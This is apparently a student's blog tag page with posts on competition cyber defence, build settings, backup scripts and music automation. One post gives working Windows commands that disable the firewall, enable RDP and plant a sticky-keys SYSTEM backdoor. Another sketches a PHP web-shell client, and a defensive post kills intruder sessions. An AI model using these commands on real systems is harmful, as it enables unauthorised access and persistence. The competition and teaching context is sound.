Articles tagged old

  1. Compiling Redistributable DLL Independent in Visual Studio


    I was just looking into this today and figured it was worth posting about. Code compiled with Visual Studio usually needs a redistributable package (e.g. the Visual C++ Redistributables) to run. This is a set of DLLs that lets the resulting executable be smaller by keeping common runtime functions in shared DLLs rather than in the executable file itself. There is a way to turn this off, though, so your malware/program/whatever can stand on its own.

    Project -> [Project Name] Properties
    Configuration Properties -> C/C++ (or whatever language) -> Code Generation -> Runtime Library -> set to Multi-threaded (/MT)
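
    If you'd rather build from the command line, the same setting is just the /MT compiler flag, which links the static C runtime instead of the DLL version (the file name here is a hypothetical example):

    rem /MT links libcmt.lib statically, so no redistributable DLLs are required
    cl /MT standalone.cpp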

    It's as easy as that!

  2. Simple Limited Backup Script


    I was setting up cron jobs for updating and backing up this site today and wrote a very simple script to back up MySQL, keeping only the 10 most recent backups. Check it out:

    #!/bin/bash
    date=$(date +%m%d%Y-%H%M%S)
    cd "$1"
    mysqldump --user=backupuser --password="mysqluserpassword" --all-databases --add-drop-table 2>/dev/null > mysql-backup-$date.sql
    
    ls -t | tail -n +11 | xargs rm &>/dev/null
    

    This script dumps all databases and saves the result as mysql-backup-$date.sql, where $date is "MonthDayFullyear-HourMinSec", in a directory passed as an argument. Then it runs ls -t in the directory the backups are stored in (-t sorts by modification time, newest first) and tails from line 11 onward, skipping the 10 newest files. That list is fed to xargs rm to remove all but the 10 newest backups. I thought it was neat because it doesn't even require an if statement but still gets the job done. Obviously this can be used for other types of backups, too; just use the last line of this script after backing things up and you are good to go!

    (the user backupuser only has read permissions on the DBs, so putting the password in this script isn't such a big deal)
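
    For reference, the cron entry driving a script like this might look something like the following (the schedule and paths are hypothetical stand-ins, not from the original setup):

    # run the backup at 3:30 AM daily, keeping dumps in /opt/backups
    30 3 * * * /opt/scripts/mysql-backup.sh /opt/backups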

  3. RNCCDC


    Last of Us

    This year I had the honor of competing on the Collegiate Cyber Defense Competition (CCDC) team for RIT. For those of you unfamiliar with the CCDC, it is the largest collegiate cyber security competition in the country. Over 180 schools competed in qualifying competitions, ten teams competed in each of the ten regional competitions, and the winner of each region earned the chance to compete in the National CCDC for the Alamo Cup. The competition consists of three main teams: blue, red, and white. The blue teams are teams of eight students from a school who try to secure and defend systems they are given during the competition. Those systems have critical services to maintain, such as email or DNS, and are also riddled with security flaws. At the same time, the blue teams are responsible for injects: business tasks such as setting up a VPN or central logging. The red team is a group of security professionals who try to hack into the blue teams' systems and disrupt their services. Blue teams are responsible for detecting and reporting red team activity in the form of incident response reports. The white team sets up the competition, designs the systems that are used, and monitors teams as they defend their networks and complete injects. Qualifying events are usually around 8 hours long, regionals usually run two or three days, and nationals consists of two days.

    For the past couple of years RIT has won the North East Collegiate Cyber Defense Competition (NECCDC) and gone on to nationals. This year was no exception. I would go into more detail about that, but this post is mainly focused on nationals. Last year was the same, except the team won the national championship, so this year's team had quite a name to live up to.

    Over the past few months I have gotten to know each and every one of my team members. They are honestly some of the smartest and most driven people I have ever met. We practiced and competed for months before the Raytheon National Collegiate Cyber Defense Competition (RNCCDC) of this year in San Antonio, Texas.

    Our time practicing involved studying multiple OSs, securing them, learning to run services on them, detecting and stopping attacks, and preparing for the worst. Having heard all about the competition from members of the team who were there last year, I was both nervous and excited.

    We had no idea what we were in for...

    ...


    Check out the full post for more details!

  4. Writing Me Some Windows Malware


    This year I had the pleasure of being part of the red and white teams for the first RIT Competitive Cybersecurity Club (RC3) Hacking Competition. The competition was set up similarly to ISTS or CCDC, with blue teams defending, a white team that sets up, and a red team that tries to hack the blue teams. This was my first actual red team experience in a competition scenario. I was tasked with taking on Windows alongside the other Windows guy on the CCDC team. So naturally I spent the week writing some intense malware to challenge the blue teams. This post explains a bit of what I did and some of the clever tricks I used to keep myself hidden. The malware was designed to run on Windows Vista and up and was written in C++, totaling about 2400 lines, all in Visual Studio 2013. It was nice to get back to C++ and the Windows API, as I haven't done much C or C++ since Client Server Programming with Kennedy in the spring. It was a bit frustrating at times, especially because I didn't understand Unicode compatibility until about halfway through writing this (THREE HOURS to prepend and append a quote at either end of a string...).


    Malware Functions (tl;dr, implementations below!):

    • Shut security center off
    • Shut event log off
    • Shut Windows Defender off
    • Shut off firewall
      • Turn it off
      • Set the default policy to allowinbound,allowoutbound
      • Take an existing rule from both the in and out chains, take their names and descriptions, delete the originals, and re-add them as allow all rules
      • Take any existing block rules and make them allow rules
    • Turn on RDP constantly
    • Add and re-add a user called limecat as admin
    • Create a service that spawns the malware on boot and re-spawns it if it is killed
      • If the service is killed/disabled/uninstalled then the main program spawns it back
    • Multi-threaded, multi-connection backdoor command shell
    • Sticky keys command prompt (a command-line sketch of this and the firewall tricks follows the list)
    • Prevented the user from launching procexp.exe and ProcessHacker.exe
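
    The implementations are in the full post, and the malware did all of this through the Windows API. Still, a few of these tricks have well-known command-line equivalents, so here is an approximate sketch of the firewall, RDP, and sticky keys items as plain commands, not the actual code:

    rem turn the firewall off and set the default policy to allow everything
    netsh advfirewall set allprofiles state off
    netsh advfirewall set allprofiles firewallpolicy allowinbound,allowoutbound

    rem turn on RDP
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

    rem sticky keys backdoor: five taps of shift at the login screen now spawns cmd.exe as SYSTEM
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f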

    More info and code after the jump. ...


    Check out the full post for more details!

  5. Controlling Google Play Music Globally On Mac


    I spent a couple of hours today figuring out a way to control Google Play Music within Chrome using the media keys on my MacBook. I'm using three different AppleScripts that run JavaScript in the Play Music page to perform the desired action. Here's the base script:

    on run
         tell application "Google Chrome"
             set allWins to every window
             set allTabs to {}
             repeat with currWin in allWins
                 set allTabs to allTabs & every tab of currWin
             end repeat
             repeat with currTab in allTabs
                 try
                     if (title of currTab as string) ends with "Play Music" then set musicTab to currTab
                 end try
             end repeat
             tell musicTab to execute javascript "document.querySelector('[data-id=\\"play-pause\\"]').click();" -- change play-pause to forward or rewind for the other two scripts
         end tell
    end run
    

    From here I used BetterTouchTool to launch the script corresponding to the action I wanted when the matching button was pressed. OS X handles media keys very strangely, though, so I am currently binding to shift-function key, with the function keys being the ones below the media buttons. The whole key combo to play/pause ends up being fn-shift-play/pause on my keyboard. Nifty, and it doesn't even need to bring the window to the front.

    Source: http://hints.macworld.com/comment.php?mode=view&cid=128504

  6. Linux Processes (and killing remote connections) Without ps


    The other day I was posed with a unique problem: find the PIDs of remote connections without the ps command. I was in a practice red team/blue team scenario on the blue team side, letting the attacker in on purpose and killing their connection from time to time. The exercise was to give people who don't have much red team experience the chance to get in and mess with things. We even gave them a head start of about 20 minutes on the boxes to make them vulnerable before the blue team got to see/touch them. When I sat down, a few things had been changed: aliases in bash_profile, cron tasks, web shells (it was a web box), and some other nonsense. I quickly fixed everything and put up my iptables rules. A quick issue of the w command assured me that nobody was in.

    I ended up getting bored and creating a NOPASSWD sudo account bob:bob for people to own me with. One person decided to log in and try their hand at ruining my box. I made it a point to kill their connection every so often using w to figure out the pts they were on, ps aux | grep pts/x (x being their session number) to figure out the process ID of their login shell, and then kill -9 to finally kick them off.
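
    Spelled out as commands, that routine looks something like this (pts/2 being a hypothetical session number):

    w                               # who is logged in, and on which pts
    ps aux | grep 'pts/2' | grep -v grep | awk '{print $2}' | xargs kill -9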

    The person attacking me saw that I kept killing their connection, so they deleted the ps command. I was left helpless in trying to figure out what processes they were running. Of course there are two fairly obvious solutions, one that I thought of and one that I didn't at the time. I thought to reinstall the ps binary with yum (ps lives in the procps package), but there was no internet in the lab I was in, so that wasn't an option. I spent my time trying to figure out one-liners to kill remote connections without using ps...

    The first method I thought up was using the /proc directory, as all of the processes are in there by process ID. I started exploring all of the options the find command had to offer. Since the environ file within each process's directory listed the TTY variable, I had a place to start. Here is what I came up with:

    find /proc -maxdepth 2 -name environ -exec grep /dev/pts {} \; | cut -d/ -f3 | xargs kill -9
    
    • find - the find command (use `man find` for details, this command is very powerful)
    • /proc - the directory that find looks in
    • -maxdepth 2 - Tells find to search at most two directories deep. The same environ file also appears deeper in each process's directory (under task/), and we only want one match per process.
    • -name environ - Specifies the name of the file we are looking for. In this case it is environ.
    • -exec grep /dev/pts {} \; - Find executes the command `grep /dev/pts` on each file found. The `{} \;` is just part of the syntax
    • cut -d/ -f3 - takes the output of the find command and extracts the PID from it (the find command will output "Binary file /proc/<PID>/environ matches" so we are finding the third field (-f3) delimited by / (-d/), which is the PID)
    • xargs kill -9 - takes in the PIDs as arguments to kill and force kills the process

    One problem with this method is that on some distributions (such as CentOS) some sessions that are local are listed as pts sessions, so running the w command to check your session is a good idea before you run this. If you are running under a pts the command would look something like this:

    find /proc -maxdepth 2 -name environ -exec sh -c 'grep -a /dev/pts $0 | grep -av /pts/# >/dev/null' {} \; -print | cut -d/ -f3 | xargs kill -9
    
    • find - the find command (use `man find` for details, this command is very powerful)
    • /proc - the directory that find looks in
    • -maxdepth 2 - Tells find to search at most two directories deep. The same environ file also appears deeper in each process's directory (under task/), and we only want one match per process.
    • -name environ - Specifies the name of the file we are looking for. In this case it is environ.
    • -exec sh -c 'grep -a /dev/pts $0 | grep -av /pts/# >/dev/null' {} \; - Find executes the command `grep -a /dev/pts | grep -av /pts/#` on each file found. The `{} \;` is just part of the syntax. In this case the "#" is the pts you are on; it is grep-ed out of the output and therefore doesn't show in the -print result.
    • -print - prints any files that have output when run through the -exec portion.
    • cut -d/ -f3 - takes the output of the find command and extracts the PID from it (the find command will output "/proc/<PID>/environ" so we are finding the third field (-f3) delimited by / (-d/), which is the PID)
    • xargs kill -9 - takes in the PIDs as arguments to kill and force kills the process

    The other route that was brought to my attention was using netstat to kill remote connections by PID. This is arguably more effective than the one above.

    netstat -apunt | grep STAB | awk '{print $7}' | cut -d/ -f1 | xargs kill -9
    
    • netstat -apunt - Prints active connections (-a all sockets, -p owning PID/program, -u UDP, -n numeric addresses, -t TCP).
    • grep STAB - Picks established connections out of the output of netstat (STAB matches ESTABLISHED)
    • awk '{print $7}' - prints "<PID>/<program name>", which is the 7th field in the output of netstat.
    • cut -d/ -f1 - takes "<PID>/<program name>" and extracts the PID from it
    • xargs kill -9 - takes in the PIDs as arguments to kill and force kills the process

    This got me thinking about how to kill backdoors such as the b(l)ackhole backdoor. Processes that run any type of shell directly are probably malicious; I have found this to be the case in my tests. To find active backdoors I tried the following:

    find /proc -maxdepth 2 -name cmdline -exec egrep "/bin/[a-z]*sh" {} \; | cut -d/ -f3 | xargs kill -9
    
    • find - the find command (use `man find` for details, this command is very powerful)
    • /proc - the directory that find looks in
    • -maxdepth 2 - Tells find to search at most two directories deep. The same cmdline file also appears deeper in each process's directory (under task/), and we only want one match per process.
    • -name cmdline - Specifies the name of the file we are looking for. In this case it is cmdline.
    • -exec egrep "/bin/[a-z]*sh" {} \; - Find executes the command `egrep "/bin/[a-z]*sh"` on each file found. This will match any reference to a launched shell (/bin/sh, /bin/bash, and so on). The `{} \;` is just part of the syntax.
    • cut -d/ -f3 - takes the output of the find command and extracts the PID from it (the find command will output "Binary file /proc/<PID>/cmdline matches" so we are finding the third field (-f3) delimited by / (-d/), which is the PID)
    • xargs kill -9 - takes in the PIDs as arguments to kill and force kills the process

    Additionally you can use netstat to monitor established connections.
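
    For example, something like this (the two-second interval is an arbitrary choice) will show connections as they come and go:

    watch -n 2 "netstat -apunt | grep ESTAB"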

    Some other approaches are to use lsof and who to figure out PIDs. The lsof command is used to figure out which programs have which files open. It has a ton of options, but with just a few of them it can be very easy to see what is being accessed. The options we care about let us see what files are open, who opened them, and what connections are being made. It looks something like this (thanks Luke!):

    lsof -nPi
    

    • -n - do not convert host addresses to host names
    • -P - do not convert port numbers to port names
    • -i - list files with Internet connections

    What is unique about this is that it will show what files are listening or have established connections. It becomes much easier to see if there is some sort of backdoor listening and what it is called.

    For the who command I use the -u option and present another method of killing things:

    who -u | grep pts | awk '{print $6}' | xargs kill
    

    Again, keep in mind that on some operating systems the window manager is listed as the lowest pts, so grep -v that out before you go and kill all connections.

  7. More Automation With Music - spotify2playmusic.py


    I spent about 15 hours today writing another tool in Python that moves Spotify playlists over to Play Music... ~300 lines later, it is done.

    It is unique because it does not just do exact song matching; it matches based on string similarity using the Levenshtein distance. The number returned by the levenshtein function represents how different the two strings fed into it are: the minimum number of single-character edits needed to turn one into the other (for example, "kitten" and "sitting" are a distance of 3 apart). A lower number means the strings are more similar.

    Anyway, here it is; it's late so I'm not going to write much more on it. All of the how-to is on my GitHub: https://github.com/jgeigerm/spotify2playmusic


  8. Making it Rain Shells, Web Shells - shell_interact.pl


    shell_interact is a project I have been working on since the new year and it is just finally starting to shape up into a nice little tool. PHP backdoor shells can be fun, especially when the permissions on the box have been messed with (i.e. www-data is allowed sudo with no password, /etc/shadow has wide open permissions, etc.). The downside is that you have to type each command into the URL bar of the browser. Kind of annoying. So I started on a solution.

    Perl is one of my stronger languages; I love regex and all of the built-in functions it has. So I decided to use it for this project, having just come out of the Perl class at RIT (with the notorious Dan Kennedy).

    The script utilizes curl to search for the shell and, if one is found, lets the user enter commands in a bash-like environment. All of the input is URL encoded so the activity from the program doesn't look as suspicious on the target server. If you enter a command that expects more input (such as vim) and curl hangs, control-c will terminate curl and return you to the web shell prompt. Stderr is redirected to stdout for every command so you can see errors without having to do it manually. It also enables the cd command by changing directories before each user-entered command is run. It's pretty nifty, and the code is mostly commented.
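
    The tool itself is Perl, but the core loop is simple enough to sketch in a few lines of shell. Everything below (the URL, the cmd parameter name) is a stand-in for illustration, not taken from the actual script:

    #!/bin/bash
    # talks to a hypothetical PHP shell like <?php system($_GET['cmd']); ?>
    URL="http://target/uploads/shell.php"
    dir="."
    while read -r -e -p "webshell> " cmd; do
        [ "$cmd" = "exit" ] && break
        # emulate cd by remembering the directory and prepending it to each command
        case "$cmd" in cd\ *) dir="${cmd#cd }"; continue ;; esac
        # --data-urlencode does the URL encoding; 2>&1 folds errors into the output
        curl -s -G "$URL" --data-urlencode "cmd=cd '$dir' && $cmd 2>&1"
    done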

    You can find the code on my GitHub, you can read more about the features/bugs there: https://github.com/jgeigerm/web_shell

    shell_interact.pl

  9. Automate ALL THE THINGS - rmGPMdupes.py


    I recently decided to switch from Spotify Premium to Google Play Music Unlimited for a couple of reasons, the main one being the mobile app each has to offer. A couple of months ago I decided that I wanted to pay for a music service because it would end up costing the equivalent of one album per month, which is way less than I actually bought. I wanted a service that had a big catalog, a good mobile app, and the ability to sync my local songs that were not in the service's database. The obvious first choice was Spotify, because I had been using it for free for a while and had actually paid for and used the Premium version on my iPhone previously. There was, on the other hand, Google Play Music Unlimited, which was made known to me via the Google Play Music app on the Galaxy S4 I got in July. I already knew of Google Play Music and had uploaded around 10,000 of my songs to it, but had only recently seen the Unlimited service. The main turn-off about Google Play Music Unlimited at the time was the app: it did not allow you to store your downloaded tracks on the external SD card, only the internal one. The Spotify app did. So that's what I went with...

    The Spotify app developed some problems over the time I paid for the service. One of the major letdowns was the need to sync local files from my computer, which wouldn't have been such a problem if the app didn't delete my local songs about once a week. The sync feature would not work on the RIT wifi, so I had to sync by other means (namely setting up a shared wireless connection from my laptop and having my phone join it). Another issue I had was the noise... music would often glitch and skip while I was listening to it. This drives me NUTS.

    About a week and a half ago I took another look at the Google Play Music app and to my surprise, found an option to store downloaded music on the external card. I immediately cancelled my Spotify Premium subscription and signed up for Google Play Music Unlimited.

    So now the daunting task of moving my playlists over...

    When I moved from iTunes to Spotify I used an online converter to import my playlists, and have made some since. Google Play Music Manager automatically updates playlists from iTunes as they are made. The problem with this is that these playlists sometimes (most of the time) contain duplicate songs. This is annoying as I like my playlists nice and organized with no duplicates.

    So I found myself going through and deleting all of the duplicates manually for about 5 playlists... and then I said to myself, "there has to be a way to automate this."

    Sure enough, Googling "google play music api" turned up the Unofficial Google Music API by Simon Weber, written in Python.

    I am sort of new to Python at this point, but I am actively learning it by taking on small projects such as this. I am also reading the "Violent Python" and "Gray Hat Python" books to help me apply the language to my profession.

    So here it is... rmGPMdupes.py: https://github.com/jgeigerm/rmGPMdupes

    It took about 4 hours to get to know the API and fix bugs but it works and I can use my Google Play Music player without going crazy due to the duplicate songs in my playlists!

    Now back to moving playlists from Spotify to Play Music... grumble
